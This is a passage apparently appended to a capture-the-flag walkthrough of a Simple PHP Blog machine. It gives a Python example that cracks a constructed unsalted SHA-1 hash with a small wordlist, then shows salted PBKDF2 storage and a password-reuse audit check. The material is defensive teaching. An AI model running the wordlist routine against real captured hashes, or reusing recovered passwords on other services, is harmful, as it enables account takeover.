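The two root causes in this summary are an unsalted, fast hash in the database and password reuse between MySQL and the OS root account. The following Python example (added here, not code from the original post or from Simple PHP Blog) shows why an unsalted SHA-1 value falls to a plain wordlist check, and how a salted, iterated KDF (PBKDF2-HMAC-SHA256 from the standard library) removes that property. The wordlist, the "database" hash and the storage format `iterations$salt$digest` are all constructed for the example; none of the values come from the target machine.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Constructed wordlist standing in for the dictionary used during "password collision".
CONSTRUCTED_WORDLIST = ["password", "letmein", "blogadmin", "summer2011", "hunter2"]


def sha1_hex(password: str) -> str:
    """Unsalted SHA-1 as an old CMS or MySQL PASSWORD() style store might keep it."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


# Constructed sample of what the walkthrough found in the DB: one unsalted SHA-1 digest.
CONSTRUCTED_DB_HASH = sha1_hex("summer2011")


def crack_unsalted_sha1(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary check against a fast, unsalted hash.

    One digest per candidate is all it takes, and because there is no salt the
    same digest table works against every account in the database at once.
    """
    for candidate in wordlist:
        if hmac.compare_digest(sha1_hex(candidate), target_hex):
            return candidate
    return None


def hash_password(password: str, salt: Optional[bytes] = None, iterations: int = 200_000) -> str:
    """Hardened storage: random per-user salt plus an iterated KDF.

    Format (assumed for this example): "<iterations>$<salt hex>$<derived key hex>".
    """
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Re-derive with the stored salt and iteration count; constant-time compare."""
    iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def reuse_detected(cleartext: str, other_store: str) -> bool:
    """Audit helper: does a password recovered from one service also open another?

    This is the check that would have flagged the MySQL-root / Linux-root reuse
    before an attacker did; other_store is a hardened record from hash_password().
    """
    return verify_password(cleartext, other_store)


if __name__ == "__main__":
    hit = crack_unsalted_sha1(CONSTRUCTED_DB_HASH, CONSTRUCTED_WORDLIST)
    print("unsalted SHA-1 recovered from wordlist:", hit)

    os_record = hash_password(hit)          # simulate the OS account reusing it
    print("reuse across services:", reuse_detected(hit, os_record))

    # With a per-user salt, the same password yields different records, so a
    # single precomputed table cannot be replayed across accounts.
    print("two hashes of the same password differ:",
          hash_password("summer2011") != hash_password("summer2011"))
```

The point for the defender is the asymmetry: the unsalted SHA-1 lookup costs one hash per guess and its result transfers to every account and every service that reused the password, whereas the PBKDF2 record costs 200,000 iterations per guess, differs per user because of the salt, and only answers for the one service it was issued by.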
